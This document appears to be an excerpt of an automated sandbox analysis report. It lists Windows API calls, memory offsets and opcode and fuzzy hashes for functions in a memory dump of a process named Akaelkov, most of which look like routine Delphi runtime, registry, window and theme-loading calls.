                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,04090524), ref: 040904F2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID: MS Shell Dlg 2
                                                                                                    • API String ID: 3660427363-3198668166
                                                                                                    • Opcode ID: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
                                                                                                    • Instruction ID: 5415ca53fb44f174396735fabb7bcae4b0659d104c51bdde3db26e1f60c4db35
                                                                                                    • Opcode Fuzzy Hash: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
                                                                                                    • Instruction Fuzzy Hash: 70F030723091486BE704EAAD9D40FEB7BDCDB85258F01853AB94CD7250DA21EC099765
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6fefd3c6397b0fd034367a5621862a973db13644aa33152177d2c433fb55745b
                                                                                                    • Instruction ID: 345eb865f2f1be4abe7419c268b7201deaa8bbb80aecd025e894e917ad74603f
                                                                                                    • Opcode Fuzzy Hash: 6fefd3c6397b0fd034367a5621862a973db13644aa33152177d2c433fb55745b
                                                                                                    • Instruction Fuzzy Hash: 5B419FB5D012448FEB64DF69D4847997BE0FB0A328F148159D818AB285C7B8B8C5CF5B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClearVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1473721057-0
                                                                                                    • Opcode ID: ceec14ed585e301059c968f4b93f140275ac951cfec4f703c25562629e7343be
                                                                                                    • Instruction ID: cca3a198bdc4726581a55f6ac7153758b7d39710e1951139b935fae8d94677be
                                                                                                    • Opcode Fuzzy Hash: ceec14ed585e301059c968f4b93f140275ac951cfec4f703c25562629e7343be
                                                                                                    • Instruction Fuzzy Hash: 1BF0C278F1424286A7117B38CDC4DF9239DAF4128CB504475E046BB251DB25FC4AD36F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1927566239-0
                                                                                                    • Opcode ID: fe571bd1c8accac6d1faa27284f2e56eb00b19114b5e2f043710f4e51ab8f742
                                                                                                    • Instruction ID: d0f1a4674bc633da80217cddf23f8e8a1f77784691d7ec78ec0e26cd209d09ef
                                                                                                    • Opcode Fuzzy Hash: fe571bd1c8accac6d1faa27284f2e56eb00b19114b5e2f043710f4e51ab8f742
                                                                                                    • Instruction Fuzzy Hash: 37314371E002069FEB90DF98C884AAE77E8FB09308F444566F905E3250D634F950D75B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 0407FAED
                                                                                                      • Part of subcall function 0407F6D0: VariantClear.OLEAUT32(?), ref: 0407F6DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearCopy
                                                                                                    • String ID:
                                                                                                    • API String ID: 274517740-0
                                                                                                    • Opcode ID: 7f4d1b397fddb802c747c5cef14cca82782ab380b521a3b00f881c3ee151bac6
                                                                                                    • Instruction ID: a4747f0c3fda9a94b03277b76e20fbd534b6dfb7b3624e3f0ae9dad589099ed6
                                                                                                    • Opcode Fuzzy Hash: 7f4d1b397fddb802c747c5cef14cca82782ab380b521a3b00f881c3ee151bac6
                                                                                                    • Instruction Fuzzy Hash: DC11A970F0031297DB20BF25C8D09AB73E5EFC52987148466E44ABB215DA74FC40D7AB
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 040773CB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
                                                                                                    • Instruction ID: 11844c0b801480feae78f551c83c839670097ccbc85b0c4236a8307041f4f4f4
                                                                                                    • Opcode Fuzzy Hash: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
                                                                                                    • Instruction Fuzzy Hash: B5F07FB2700118BF9B80DE9DDC80EDB77ECEB4C2A8B054169BA08E3200D630ED109BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 040773CB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
                                                                                                    • Instruction ID: 0ae9059a4982a0cd9aa3e2b2f2df399701bc3e28af898dcdc50fb96f7c982261
                                                                                                    • Opcode Fuzzy Hash: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
                                                                                                    • Instruction Fuzzy Hash: FAF092B2600118BF9B80DE9DDC80EDB77ECEB4C2A8B054169FA0CE3200D630ED109BB5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00000000,040D967E), ref: 040D9612
                                                                                                      • Part of subcall function 040B7420: GetCurrentProcessId.KERNEL32(?,00000000,040B7598), ref: 040B7441
                                                                                                      • Part of subcall function 040B7420: GetCurrentThreadId.KERNEL32 ref: 040B748F
                                                                                                      • Part of subcall function 040B7420: GlobalAddAtomA.KERNEL32(00000000), ref: 040B74C5
                                                                                                      • Part of subcall function 040B7420: RegisterClipboardFormatA.USER32(00000000), ref: 040B74DB
                                                                                                      • Part of subcall function 040B7420: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,040B7598), ref: 040B755F
                                                                                                      • Part of subcall function 040B7420: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 040B7570
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Current$AddressAtomClipboardFormatGlobalHandleModuleProcProcessRegisterThreadVersion
                                                                                                    • String ID:
                                                                                                    • API String ID: 2893432522-0
                                                                                                    • Opcode ID: 18a6cbc0c51434d4dead7ba8cf5986eff94b3b1061f85647efba522fbd27e436
                                                                                                    • Instruction ID: c27d7a8328bbcb415eb9e6e75fecfc3c5f849e8b7eadacbefff42e9fbf05e325
                                                                                                    • Opcode Fuzzy Hash: 18a6cbc0c51434d4dead7ba8cf5986eff94b3b1061f85647efba522fbd27e436
                                                                                                    • Instruction Fuzzy Hash: F2F0C274205A00AFE315FF28EE4185577E4FB8A31C3500434E440BBA18CABDBC918B44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(02A41B20,?,00000105), ref: 04075B96
                                                                                                      • Part of subcall function 04075DDC: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 04075DF8
                                                                                                      • Part of subcall function 04075DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04075E16
                                                                                                      • Part of subcall function 04075DDC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04075E34
                                                                                                      • Part of subcall function 04075DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 04075E52
                                                                                                      • Part of subcall function 04075DDC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,04075EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 04075E9B
                                                                                                      • Part of subcall function 04075DDC: RegQueryValueExA.ADVAPI32(?,04076048,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,04075EE1,?,80000001), ref: 04075EB9
                                                                                                      • Part of subcall function 04075DDC: RegCloseKey.ADVAPI32(?,04075EE8,00000000,00000000,00000005,00000000,04075EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04075EDB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 2796650324-0
                                                                                                    • Opcode ID: 9711488165f6f9e55e6370d5228eb4c6dcd107eca0bc8f5d3348138f1f8277e7
                                                                                                    • Instruction ID: bedbd152cdc880044116240c4d1b4998f4e26aea818727ba5c774e8ab084455d
                                                                                                    • Opcode Fuzzy Hash: 9711488165f6f9e55e6370d5228eb4c6dcd107eca0bc8f5d3348138f1f8277e7
                                                                                                    • Instruction Fuzzy Hash: E6E06DB1E01318DFDF50DE58C9C0AD633E8AB08658F004591AD58DF786D3B0EA248BD6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3341692771-0
                                                                                                    • Opcode ID: baa1517bdadcfa67c0915616b3a2d67137bee1b5e396a356b24dbef79078f2ff
                                                                                                    • Instruction ID: 738444dc6dd5faa7265f2eb3db6427436ec549d0c4720c8013617698f2983125
                                                                                                    • Opcode Fuzzy Hash: baa1517bdadcfa67c0915616b3a2d67137bee1b5e396a356b24dbef79078f2ff
                                                                                                    • Instruction Fuzzy Hash: F5E086B4D002019DEA545A188800A3632B99BD1300F5A855CA401BF1A0DB34B801E63F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,?,040902E0,?,?,00000000,0409048C,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000), ref: 0409028E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 3535843008-0
                                                                                                    • Opcode ID: eb308aadd2150d80a81e6751e0f9366a3a2839943b2371eba3ae4dd0f782da46
                                                                                                    • Instruction ID: 6f86856375de115279165048b99f36e633145fde0d3dea820cbe0af32c5dbb94
                                                                                                    • Opcode Fuzzy Hash: eb308aadd2150d80a81e6751e0f9366a3a2839943b2371eba3ae4dd0f782da46
                                                                                                    • Instruction Fuzzy Hash: E0D017B0B002009AEF90EF7588C4B427BDC6F08318B48C8A1D809EF246DA29E8108F21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,040D062B,ScanString,041069E4,040D7AE0,OpenSession,041069E4,040D7AE0,OpenSession,041069E4,040D7AE0,ScanBuffer,041069E4,040D7AE0,ScanString), ref: 04078E0F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
                                                                                                    • Instruction ID: f9e78eba7bfaddfbf6553aa580b147ae4138dac443099129727fb38772304131
                                                                                                    • Opcode Fuzzy Hash: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
                                                                                                    • Instruction Fuzzy Hash: A6C08CA2F116000A2ED0B5FC0DCC49A0AC84A0513D3202F21E42AF31E2D323B0A3241A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3341692771-0
                                                                                                    • Opcode ID: f9cf8d993bf6b984c3a206198d86c8bdb50b9fa8060aaea77c6d17370c297a51
                                                                                                    • Instruction ID: b607092f0584de75f52fab1c7e0a6c334782b2da7173514ef871da06f488ef55
                                                                                                    • Opcode Fuzzy Hash: f9cf8d993bf6b984c3a206198d86c8bdb50b9fa8060aaea77c6d17370c297a51
                                                                                                    • Instruction Fuzzy Hash: 0FC012B1E612200BFB719A589CC0B5562DC9B05255F5404A1E504FB350E260B8105356
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3341692771-0
                                                                                                    • Opcode ID: 478ca0e79f943246b1b3029f9eea381ecbc249769f11debf24d3064ab636df96
                                                                                                    • Instruction ID: 0231eec19a3b9a80730949016aba5135cc612acbdeebdaeaeca8f38a64921d04
                                                                                                    • Opcode Fuzzy Hash: 478ca0e79f943246b1b3029f9eea381ecbc249769f11debf24d3064ab636df96
                                                                                                    • Instruction Fuzzy Hash: F8C0807CD153015DBF042F704904A7E23BC9D81204745445CD911F81D0D524F473742F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 0407167E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 1ab62c1352da55b3199a95ca9e3bc0e99eef7735ffbb70b6ccf4ff8c8de1ea7a
                                                                                                    • Instruction ID: 57cabf11d2e45f09f0d6fc499d370559c054f6a3ecbff862d045769ae7f25af2
                                                                                                    • Opcode Fuzzy Hash: 1ab62c1352da55b3199a95ca9e3bc0e99eef7735ffbb70b6ccf4ff8c8de1ea7a
                                                                                                    • Instruction Fuzzy Hash: 57F04FF0B103008FEB06DF7A9D443417AD2E789388F148179E615EF3C4E7B5A8828B54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 04071740
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 11bb7cb161738e1202d152692dee8b08c4654f01ea34e12475c26ed5ec337602
                                                                                                    • Instruction ID: 39d09c24b45fedd5343c1c80a2f1162c6046f035f2db6a874cffdd85db395aee
                                                                                                    • Opcode Fuzzy Hash: 11bb7cb161738e1202d152692dee8b08c4654f01ea34e12475c26ed5ec337602
                                                                                                    • Instruction Fuzzy Hash: D2F090F2A006556BE3119F5A9C90B83BB94FB40354F054139EA48AB385D7B5AC40CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 040717A0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1263568516-0
                                                                                                    • Opcode ID: ad0b2965d89ad3b738f0c7f802abc85e5283540e38ae68a199bbfab368737f37
                                                                                                    • Instruction ID: 0f0ba4ce4f03129c4cce997aee50eb9e14494dc60ea5294ef1644a2faf492bbd
                                                                                                    • Opcode Fuzzy Hash: ad0b2965d89ad3b738f0c7f802abc85e5283540e38ae68a199bbfab368737f37
                                                                                                    • Instruction Fuzzy Hash: 29E0DFB17003006EE3201F7E4C80B426AE8EB48664F240665F140EF3C1D2A0FC008766
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RegisterAutomation$vcltest3.dll
                                                                                                    • API String ID: 0-2963190186
                                                                                                    • Opcode ID: 15b6ba138dba5bbc53f79932f4030c42663079d8d7fb9eedc90e01eb2db5b5b4
                                                                                                    • Instruction ID: aa09106f11e714a03f598462391f900c1af21b8d5949e0c63680e38b46d27383
                                                                                                    • Opcode Fuzzy Hash: 15b6ba138dba5bbc53f79932f4030c42663079d8d7fb9eedc90e01eb2db5b5b4
                                                                                                    • Instruction Fuzzy Hash: 12E12935A20204EFEB54EBA8C584A9DB7F1AB04318F14C1ADEC05BB261D734FE44DB45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2b22c3fee068523151c1f5dfea37b2c8b38549cafc8f3b87b92abfb6f0c62125
                                                                                                    • Instruction ID: 1e144667208f9b0b69fc87f7aec03ac4e57e3d50173c12426c167823a689272a
                                                                                                    • Opcode Fuzzy Hash: 2b22c3fee068523151c1f5dfea37b2c8b38549cafc8f3b87b92abfb6f0c62125
                                                                                                    • Instruction Fuzzy Hash: B1023531A04205EFEB50EBA8C984BED77F5AF04348F1641A4E944FB262D775BE80DB84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 040B225B
                                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 040B2278
                                                                                                    • GetWindowRect.USER32(?), ref: 040B2291
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 040B229F
                                                                                                    • GetWindowLongA.USER32(?,000000F8), ref: 040B22B4
                                                                                                    • ScreenToClient.USER32(00000000), ref: 040B22C1
                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 040B22CC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                    • String ID: ,
                                                                                                    • API String ID: 2266315723-3772416878
                                                                                                    • Opcode ID: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
                                                                                                    • Instruction ID: ba9481ebbf413f2b3eee01f3210467544b986be8a4bcdd66c715d1f0f98ab3c2
                                                                                                    • Opcode Fuzzy Hash: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
                                                                                                    • Instruction Fuzzy Hash: 4D113371904301AFDB10EFACC984ACB77D8AF49358F0449A9FE58EB245D735F8048BA6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: RestoreSave$Focus
                                                                                                    • String ID:
                                                                                                    • API String ID: 1675357626-0
                                                                                                    • Opcode ID: 47b0aa99627a7821ff5580872e62d4db892a55420c875ea0c0c0911f118a0537
                                                                                                    • Instruction ID: 395b838c3c272603188b001d0c7d5e057a3c949da0a5c81a24c1854ce04b808f
                                                                                                    • Opcode Fuzzy Hash: 47b0aa99627a7821ff5580872e62d4db892a55420c875ea0c0c0911f118a0537
                                                                                                    • Instruction Fuzzy Hash: 36C14B31A042049FFB55DF68C599AEEB7F5EB44304F1584A9E884BB250DB30FE40DB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0409BAF7), ref: 0409B77A
                                                                                                    • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0409B792
                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0409B7A4
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0409B7B6
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0409B7C8
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0409B7DA
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0409B7EC
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0409B7FE
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0409B810
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0409B822
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0409B834
                                                                                                    • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0409B846
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0409B858
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0409B86A
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0409B87C
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0409B88E
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0409B8A0
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0409B8B2
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0409B8C4
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0409B8D6
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0409B8E8
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0409B8FA
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0409B90C
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0409B91E
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0409B930
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0409B942
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0409B954
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0409B966
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0409B978
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0409B98A
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0409B99C
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0409B9AE
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0409B9C0
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0409B9D2
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0409B9E4
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0409B9F6
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0409BA08
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0409BA1A
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0409BA2C
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0409BA3E
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0409BA50
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0409BA62
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0409BA74
